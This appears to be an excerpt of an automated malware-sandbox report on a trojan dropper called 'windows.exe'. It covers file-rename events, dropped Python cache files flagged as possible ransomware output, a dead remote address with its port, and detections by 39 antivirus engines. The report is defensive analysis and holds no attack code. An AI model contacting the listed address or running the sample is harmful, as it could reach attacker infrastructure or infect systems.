MoveFileWithProgressW May 14, 2023, 5:04 p.m.	newfilepath_r: C:\Users\test22\wshsdk\lib\json\__pycache__\decoder.cpython-37.pyc flags: 1 oldfilepath_r: C:\Users\test22\wshsdk\lib\json\__pycache__\decoder.cpython-37.pyc.8644608 newfilepath: C:\Users\test22\wshsdk\Lib\json\__pycache__\decoder.cpython-37.pyc oldfilepath: C:\Users\test22\wshsdk\Lib\json\__pycache__\decoder.cpython-37.pyc.8644608	1	1
MoveFileWithProgressW May 14, 2023, 5:04 p.m.	newfilepath_r: C:\Users\test22\wshsdk\lib\__pycache__\re.cpython-37.pyc flags: 1 oldfilepath_r: C:\Users\test22\wshsdk\lib\__pycache__\re.cpython-37.pyc.8594848 newfilepath: C:\Users\test22\wshsdk\Lib\__pycache__\re.cpython-37.pyc oldfilepath: C:\Users\test22\wshsdk\Lib\__pycache__\re.cpython-37.pyc.8594848	1	1
MoveFileWithProgressW May 14, 2023, 5:04 p.m.	newfilepath_r: C:\Users\test22\wshsdk\lib\__pycache__\enum.cpython-37.pyc flags: 1 oldfilepath_r: C:\Users\test22\wshsdk\lib\__pycache__\enum.cpython-37.pyc.9042896 newfilepath: C:\Users\test22\wshsdk\Lib\__pycache__\enum.cpython-37.pyc oldfilepath: C:\Users\test22\wshsdk\Lib\__pycache__\enum.cpython-37.pyc.9042896	1	1
MoveFileWithProgressW May 14, 2023, 5:04 p.m.	newfilepath_r: C:\Users\test22\wshsdk\lib\__pycache__\types.cpython-37.pyc flags: 1 oldfilepath_r: C:\Users\test22\wshsdk\lib\__pycache__\types.cpython-37.pyc.8724512 newfilepath: C:\Users\test22\wshsdk\Lib\__pycache__\types.cpython-37.pyc oldfilepath: C:\Users\test22\wshsdk\Lib\__pycache__\types.cpython-37.pyc.8724512	1	1
MoveFileWithProgressW May 14, 2023, 5:04 p.m.	newfilepath_r: C:\Users\test22\wshsdk\lib\__pycache__\sre_compile.cpython-37.pyc flags: 1 oldfilepath_r: C:\Users\test22\wshsdk\lib\__pycache__\sre_compile.cpython-37.pyc.8674048 newfilepath: C:\Users\test22\wshsdk\Lib\__pycache__\sre_compile.cpython-37.pyc oldfilepath: C:\Users\test22\wshsdk\Lib\__pycache__\sre_compile.cpython-37.pyc.8674048	1	1
MoveFileWithProgressW May 14, 2023, 5:04 p.m.	newfilepath_r: C:\Users\test22\wshsdk\lib\__pycache__\sre_parse.cpython-37.pyc flags: 1 oldfilepath_r: C:\Users\test22\wshsdk\lib\__pycache__\sre_parse.cpython-37.pyc.8844088 newfilepath: C:\Users\test22\wshsdk\Lib\__pycache__\sre_parse.cpython-37.pyc oldfilepath: C:\Users\test22\wshsdk\Lib\__pycache__\sre_parse.cpython-37.pyc.8844088	1	1
MoveFileWithProgressW May 14, 2023, 5:04 p.m.	newfilepath_r: C:\Users\test22\wshsdk\lib\__pycache__\sre_constants.cpython-37.pyc flags: 1 oldfilepath_r: C:\Users\test22\wshsdk\lib\__pycache__\sre_constants.cpython-37.pyc.8674432 newfilepath: C:\Users\test22\wshsdk\Lib\__pycache__\sre_constants.cpython-37.pyc oldfilepath: C:\Users\test22\wshsdk\Lib\__pycache__\sre_constants.cpython-37.pyc.8674432	1	1
MoveFileWithProgressW May 14, 2023, 5:04 p.m.	newfilepath_r: C:\Users\test22\wshsdk\lib\__pycache__\functools.cpython-37.pyc flags: 1 oldfilepath_r: C:\Users\test22\wshsdk\lib\__pycache__\functools.cpython-37.pyc.8733408 newfilepath: C:\Users\test22\wshsdk\Lib\__pycache__\functools.cpython-37.pyc oldfilepath: C:\Users\test22\wshsdk\Lib\__pycache__\functools.cpython-37.pyc.8733408	1	1
MoveFileWithProgressW May 14, 2023, 5:04 p.m.	newfilepath_r: C:\Users\test22\wshsdk\lib\__pycache__\copyreg.cpython-37.pyc flags: 1 oldfilepath_r: C:\Users\test22\wshsdk\lib\__pycache__\copyreg.cpython-37.pyc.8132264 newfilepath: C:\Users\test22\wshsdk\Lib\__pycache__\copyreg.cpython-37.pyc oldfilepath: C:\Users\test22\wshsdk\Lib\__pycache__\copyreg.cpython-37.pyc.8132264	1	1
MoveFileWithProgressW May 14, 2023, 5:04 p.m.	newfilepath_r: C:\Users\test22\wshsdk\lib\json\__pycache__\scanner.cpython-37.pyc flags: 1 oldfilepath_r: C:\Users\test22\wshsdk\lib\json\__pycache__\scanner.cpython-37.pyc.8644800 newfilepath: C:\Users\test22\wshsdk\Lib\json\__pycache__\scanner.cpython-37.pyc oldfilepath: C:\Users\test22\wshsdk\Lib\json\__pycache__\scanner.cpython-37.pyc.8644800	1	1
MoveFileWithProgressW May 14, 2023, 5:04 p.m.	newfilepath_r: C:\Users\test22\wshsdk\lib\json\__pycache__\encoder.cpython-37.pyc flags: 1 oldfilepath_r: C:\Users\test22\wshsdk\lib\json\__pycache__\encoder.cpython-37.pyc.8645472 newfilepath: C:\Users\test22\wshsdk\Lib\json\__pycache__\encoder.cpython-37.pyc oldfilepath: C:\Users\test22\wshsdk\Lib\json\__pycache__\encoder.cpython-37.pyc.8645472	1	1
MoveFileWithProgressW May 14, 2023, 5:04 p.m.	newfilepath_r: C:\Users\test22\wshsdk\lib\__pycache__\base64.cpython-37.pyc flags: 1 oldfilepath_r: C:\Users\test22\wshsdk\lib\__pycache__\base64.cpython-37.pyc.9084384 newfilepath: C:\Users\test22\wshsdk\Lib\__pycache__\base64.cpython-37.pyc oldfilepath: C:\Users\test22\wshsdk\Lib\__pycache__\base64.cpython-37.pyc.9084384	1	1
MoveFileWithProgressW May 14, 2023, 5:04 p.m.	newfilepath_r: C:\Users\test22\wshsdk\lib\__pycache__\struct.cpython-37.pyc flags: 1 oldfilepath_r: C:\Users\test22\wshsdk\lib\__pycache__\struct.cpython-37.pyc.8208280 newfilepath: C:\Users\test22\wshsdk\Lib\__pycache__\struct.cpython-37.pyc oldfilepath: C:\Users\test22\wshsdk\Lib\__pycache__\struct.cpython-37.pyc.8208280	1	1
MoveFileWithProgressW May 14, 2023, 5:04 p.m.	newfilepath_r: C:\Users\test22\wshsdk\lib\site-packages\Crypto\__pycache__\__init__.cpython-37.pyc flags: 1 oldfilepath_r: C:\Users\test22\wshsdk\lib\site-packages\Crypto\__pycache__\__init__.cpython-37.pyc.8127392 newfilepath: C:\Users\test22\wshsdk\Lib\site-packages\Crypto\__pycache__\__init__.cpython-37.pyc oldfilepath: C:\Users\test22\wshsdk\Lib\site-packages\Crypto\__pycache__\__init__.cpython-37.pyc.8127392	1	1
MoveFileWithProgressW May 14, 2023, 5:04 p.m.	newfilepath_r: C:\Users\test22\wshsdk\lib\site-packages\Crypto\Cipher\__pycache__\__init__.cpython-37.pyc flags: 1 oldfilepath_r: C:\Users\test22\wshsdk\lib\site-packages\Crypto\Cipher\__pycache__\__init__.cpython-37.pyc.8230096 newfilepath: C:\Users\test22\wshsdk\Lib\site-packages\Crypto\Cipher\__pycache__\__init__.cpython-37.pyc oldfilepath: C:\Users\test22\wshsdk\Lib\site-packages\Crypto\Cipher\__pycache__\__init__.cpython-37.pyc.8230096	1	1
MoveFileWithProgressW May 14, 2023, 5:04 p.m.	newfilepath_r: C:\Users\test22\wshsdk\lib\site-packages\Crypto\Cipher\__pycache__\_mode_ecb.cpython-37.pyc flags: 1 oldfilepath_r: C:\Users\test22\wshsdk\lib\site-packages\Crypto\Cipher\__pycache__\_mode_ecb.cpython-37.pyc.8230216 newfilepath: C:\Users\test22\wshsdk\Lib\site-packages\Crypto\Cipher\__pycache__\_mode_ecb.cpython-37.pyc oldfilepath: C:\Users\test22\wshsdk\Lib\site-packages\Crypto\Cipher\__pycache__\_mode_ecb.cpython-37.pyc.8230216	1	1
MoveFileWithProgressW May 14, 2023, 5:04 p.m.	newfilepath_r: C:\Users\test22\wshsdk\lib\site-packages\Crypto\Util\__pycache__\__init__.cpython-37.pyc flags: 1 oldfilepath_r: C:\Users\test22\wshsdk\lib\site-packages\Crypto\Util\__pycache__\__init__.cpython-37.pyc.8229736 newfilepath: C:\Users\test22\wshsdk\Lib\site-packages\Crypto\Util\__pycache__\__init__.cpython-37.pyc oldfilepath: C:\Users\test22\wshsdk\Lib\site-packages\Crypto\Util\__pycache__\__init__.cpython-37.pyc.8229736	1	1
MoveFileWithProgressW May 14, 2023, 5:04 p.m.	newfilepath_r: C:\Users\test22\wshsdk\lib\site-packages\Crypto\Util\__pycache__\_raw_api.cpython-37.pyc flags: 1 oldfilepath_r: C:\Users\test22\wshsdk\lib\site-packages\Crypto\Util\__pycache__\_raw_api.cpython-37.pyc.8231416 newfilepath: C:\Users\test22\wshsdk\Lib\site-packages\Crypto\Util\__pycache__\_raw_api.cpython-37.pyc oldfilepath: C:\Users\test22\wshsdk\Lib\site-packages\Crypto\Util\__pycache__\_raw_api.cpython-37.pyc.8231416	1	1
MoveFileWithProgressW May 14, 2023, 5:04 p.m.	newfilepath_r: C:\Users\test22\wshsdk\lib\site-packages\Crypto\Util\__pycache__\py3compat.cpython-37.pyc flags: 1 oldfilepath_r: C:\Users\test22\wshsdk\lib\site-packages\Crypto\Util\__pycache__\py3compat.cpython-37.pyc.8229496 newfilepath: C:\Users\test22\wshsdk\Lib\site-packages\Crypto\Util\__pycache__\py3compat.cpython-37.pyc oldfilepath: C:\Users\test22\wshsdk\Lib\site-packages\Crypto\Util\__pycache__\py3compat.cpython-37.pyc.8229496	1	1
MoveFileWithProgressW May 14, 2023, 5:04 p.m.	newfilepath_r: C:\Users\test22\wshsdk\lib\site-packages\Crypto\Util\__pycache__\_file_system.cpython-37.pyc flags: 1 oldfilepath_r: C:\Users\test22\wshsdk\lib\site-packages\Crypto\Util\__pycache__\_file_system.cpython-37.pyc.8231296 newfilepath: C:\Users\test22\wshsdk\Lib\site-packages\Crypto\Util\__pycache__\_file_system.cpython-37.pyc oldfilepath: C:\Users\test22\wshsdk\Lib\site-packages\Crypto\Util\__pycache__\_file_system.cpython-37.pyc.8231296	1	1
MoveFileWithProgressW May 14, 2023, 5:04 p.m.	newfilepath_r: C:\Users\test22\wshsdk\lib\importlib\__pycache__\__init__.cpython-37.pyc flags: 1 oldfilepath_r: C:\Users\test22\wshsdk\lib\importlib\__pycache__\__init__.cpython-37.pyc.8188664 newfilepath: C:\Users\test22\wshsdk\Lib\importlib\__pycache__\__init__.cpython-37.pyc oldfilepath: C:\Users\test22\wshsdk\Lib\importlib\__pycache__\__init__.cpython-37.pyc.8188664	1	1
MoveFileWithProgressW May 14, 2023, 5:04 p.m.	newfilepath_r: C:\Users\test22\wshsdk\lib\__pycache__\warnings.cpython-37.pyc flags: 1 oldfilepath_r: C:\Users\test22\wshsdk\lib\__pycache__\warnings.cpython-37.pyc.8295312 newfilepath: C:\Users\test22\wshsdk\Lib\__pycache__\warnings.cpython-37.pyc oldfilepath: C:\Users\test22\wshsdk\Lib\__pycache__\warnings.cpython-37.pyc.8295312	1	1
MoveFileWithProgressW May 14, 2023, 5:04 p.m.	newfilepath_r: C:\Users\test22\wshsdk\lib\importlib\__pycache__\machinery.cpython-37.pyc flags: 1 oldfilepath_r: C:\Users\test22\wshsdk\lib\importlib\__pycache__\machinery.cpython-37.pyc.8189392 newfilepath: C:\Users\test22\wshsdk\Lib\importlib\__pycache__\machinery.cpython-37.pyc oldfilepath: C:\Users\test22\wshsdk\Lib\importlib\__pycache__\machinery.cpython-37.pyc.8189392	1	1
MoveFileWithProgressW May 14, 2023, 5:04 p.m.	newfilepath_r: C:\Users\test22\wshsdk\lib\ctypes\__pycache__\__init__.cpython-37.pyc flags: 1 oldfilepath_r: C:\Users\test22\wshsdk\lib\ctypes\__pycache__\__init__.cpython-37.pyc.8644704 newfilepath: C:\Users\test22\wshsdk\Lib\ctypes\__pycache__\__init__.cpython-37.pyc oldfilepath: C:\Users\test22\wshsdk\Lib\ctypes\__pycache__\__init__.cpython-37.pyc.8644704	1	1
MoveFileWithProgressW May 14, 2023, 5:04 p.m.	newfilepath_r: C:\Users\test22\wshsdk\lib\ctypes\__pycache__\_endian.cpython-37.pyc flags: 1 oldfilepath_r: C:\Users\test22\wshsdk\lib\ctypes\__pycache__\_endian.cpython-37.pyc.8646240 newfilepath: C:\Users\test22\wshsdk\Lib\ctypes\__pycache__\_endian.cpython-37.pyc oldfilepath: C:\Users\test22\wshsdk\Lib\ctypes\__pycache__\_endian.cpython-37.pyc.8646240	1	1

Drops 388 unknown file mime types indicative of ransomware writing encrypted files back to disk (50 out of 388 events)

file	C:\Users\test22\wshsdk\Lib\__pycache__\enum.cpython-37.pyc
file	C:\Users\test22\wshsdk\Lib\__pycache__\_collections_abc.cpython-37.pyc
file	C:\Users\test22\wshsdk\Lib\site-packages\win32\Demos\c_extension\__pycache__\setup.cpython-37.pyc
file	C:\Users\test22\wshsdk\Lib\site-packages\Crypto\Hash\__pycache__\SHA3_512.cpython-37.pyc
file	C:\Users\test22\wshsdk\Lib\__pycache__\nturl2path.cpython-37.pyc
file	C:\Users\test22\wshsdk\Lib\site-packages\win32\lib\__pycache__\winioctlcon.cpython-37.pyc
file	C:\Users\test22\wshsdk\Lib\__pycache__\abc.cpython-37.pyc
file	C:\Users\test22\wshsdk\Lib\__pycache__\lzma.cpython-37.pyc
file	C:\Users\test22\wshsdk\Lib\site-packages\Crypto\Util\__pycache__\py3compat.cpython-37.pyc
file	C:\Users\test22\wshsdk\Lib\site-packages\Crypto\IO\__pycache__\__init__.cpython-37.pyc
file	C:\Users\test22\wshsdk\Lib\site-packages\Crypto\Hash\__pycache__\SHAKE128.cpython-37.pyc
file	C:\Users\test22\wshsdk\Lib\site-packages\Crypto\Signature\__pycache__\PKCS1_PSS.cpython-37.pyc
file	C:\Users\test22\wshsdk\Lib\__pycache__\subprocess.cpython-37.pyc
file	C:\Users\test22\wshsdk\Lib\site-packages\adodbapi\__pycache__\__init__.cpython-37.pyc
file	C:\Users\test22\wshsdk\Lib\site-packages\adodbapi\examples\__pycache__\db_table_names.cpython-37.pyc
file	C:\Users\test22\wshsdk\Lib\__pycache__\struct.cpython-37.pyc
file	C:\Users\test22\wshsdk\Lib\site-packages\Crypto\Protocol\__pycache__\KDF.cpython-37.pyc
file	C:\Users\test22\wshsdk\Lib\encodings\__pycache__\utf_8.cpython-37.pyc
file	c:\users\test22\appdata\roaming\microsoft\windows\recent\customdestinations\d93f411851d7c929.customdestinations-ms
file	C:\Users\test22\wshsdk\Lib\__pycache__\ntpath.cpython-37.pyc
file	C:\Users\test22\wshsdk\Lib\ctypes\__pycache__\__init__.cpython-37.pyc
file	C:\Users\test22\wshsdk\Lib\site-packages\isapi\test\__pycache__\extension_simple.cpython-37.pyc
file	C:\Users\test22\wshsdk\Lib\site-packages\Crypto\Signature\__pycache__\__init__.cpython-37.pyc
file	C:\Users\test22\wshsdk\Lib\__pycache__\_compression.cpython-37.pyc
file	C:\Users\test22\wshsdk\Lib\site-packages\Crypto\Cipher\__pycache__\AES.cpython-37.pyc
file	C:\Users\test22\wshsdk\Lib\site-packages\win32\Demos\__pycache__\GetSaveFileName.cpython-37.pyc
file	C:\Users\test22\wshsdk\Lib\site-packages\adodbapi\examples\__pycache__\xls_read.cpython-37.pyc
file	C:\Users\test22\wshsdk\Lib\__pycache__\socketserver.cpython-37.pyc
file	C:\Users\test22\wshsdk\Lib\site-packages\win32\test\__pycache__\test_win32trace.cpython-37.pyc
file	C:\Users\test22\wshsdk\Lib\site-packages\win32\Demos\__pycache__\win32clipboardDemo.cpython-37.pyc
file	C:\Users\test22\wshsdk\Lib\site-packages\Crypto\IO\__pycache__\PEM.cpython-37.pyc
file	C:\Users\test22\wshsdk\Lib\site-packages\win32\Demos\__pycache__\eventLogDemo.cpython-37.pyc
file	C:\Users\test22\wshsdk\Lib\site-packages\win32\lib\__pycache__\ntsecuritycon.cpython-37.pyc
file	C:\Users\test22\wshsdk\Lib\site-packages\Crypto\Hash\__pycache__\__init__.cpython-37.pyc
file	C:\Users\test22\wshsdk\Lib\site-packages\win32\test\__pycache__\test_win32inet.cpython-37.pyc
file	C:\Users\test22\wshsdk\Lib\__pycache__\weakref.cpython-37.pyc
file	C:\Users\test22\wshsdk\Lib\site-packages\win32\Demos\__pycache__\win32gui_devicenotify.cpython-37.pyc
file	C:\Users\test22\wshsdk\Lib\site-packages\adodbapi\examples\__pycache__\xls_write.cpython-37.pyc
file	C:\Users\test22\wshsdk\Lib\collections\__pycache__\__init__.cpython-37.pyc
file	C:\Users\test22\wshsdk\Lib\site-packages\Crypto\Hash\__pycache__\MD2.cpython-37.pyc
file	C:\Users\test22\wshsdk\Lib\site-packages\win32\Demos\__pycache__\win32clipboard_bitmapdemo.cpython-37.pyc
file	C:\Users\test22\wshsdk\Lib\__pycache__\gettext.cpython-37.pyc
file	C:\Users\test22\wshsdk\Lib\site-packages\win32\scripts\VersionStamp\__pycache__\bulkstamp.cpython-37.pyc
file	C:\Users\test22\wshsdk\Lib\site-packages\Crypto\Hash\__pycache__\BLAKE2s.cpython-37.pyc
file	C:\Users\test22\wshsdk\Lib\site-packages\Crypto\Cipher\__pycache__\_mode_ocb.cpython-37.pyc
file	C:\Users\test22\wshsdk\Lib\ctypes\__pycache__\wintypes.cpython-37.pyc
file	C:\Users\test22\wshsdk\Lib\site-packages\win32\Demos\__pycache__\win32cred_demo.cpython-37.pyc
file	C:\Users\test22\wshsdk\Lib\site-packages\win32\lib\__pycache__\win32verstamp.cpython-37.pyc
file	C:\Users\test22\wshsdk\Lib\site-packages\win32\test\__pycache__\test_exceptions.cpython-37.pyc
file	C:\Users\test22\wshsdk\Lib\site-packages\win32\Demos\__pycache__\win32servicedemo.cpython-37.pyc

Connects to an IP address that is no longer responding to requests (legitimate services will remain up-and-running usually) (1 event)

dead_host

142.202.242.176:5566

File has been identified by 39 AntiVirus engines on VirusTotal as malicious (39 events)

Elastic	malicious (high confidence)
DrWeb	Win32.HLLW.Autoruner3.2234
MicroWorld-eScan	Gen:Variant.Razy.628496
FireEye	Generic.mg.c159fc653a86ef3e
ALYac	Gen:Variant.Razy.628496
Cylance	unsafe
VIPRE	Gen:Variant.Razy.628496
Cynet	Malicious (score: 100)
CrowdStrike	win/malicious_confidence_100% (W)
Alibaba	Trojan:MSIL/Generic.55c55b9b
BitDefenderTheta	Gen:NN.ZemsilF.36196.Hm0@aae2qfm
Cyren	W32/MSIL_Kryptik.COX.gen!Eldorado
Symantec	ML.Attribute.HighConfidence
ESET-NOD32	a variant of MSIL/TrojanDropper.Agent.DPV
APEX	Malicious
Paloalto	generic.ml
Kaspersky	HEUR:Trojan.MSIL.Dnoper.gen
BitDefender	Gen:Variant.Razy.628496
Tencent	Msil.Trojan.Dnoper.Eplw
F-Secure	Trojan.TR/Dropper.Gen2
TrendMicro	TROJ_GEN.R002C0PEE23
McAfee-GW-Edition	GenericRXML-IL!C159FC653A86
Sophos	Mal/Generic-S
Avira	TR/Dropper.Gen2
Gridinsoft	Trojan.Win32.Gen.bot
Arcabit	Trojan.Razy.D99710
ZoneAlarm	HEUR:Trojan.MSIL.Dnoper.gen
GData	Gen:Variant.Razy.628496
Google	Detected
Acronis	suspicious
McAfee	GenericRXML-IL!C159FC653A86
MAX	malware (ai score=82)
DeepInstinct	MALICIOUS
Malwarebytes	Malware.AI.4188017722
TrendMicro-HouseCall	TROJ_GEN.R002C0PEE23
Rising	Dropper.Agent!8.2F (CLOUD)
SentinelOne	Static AI - Malicious PE
Fortinet	W32/Dnoper.DPV!tr
Panda	Trj/CI.A

windows.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All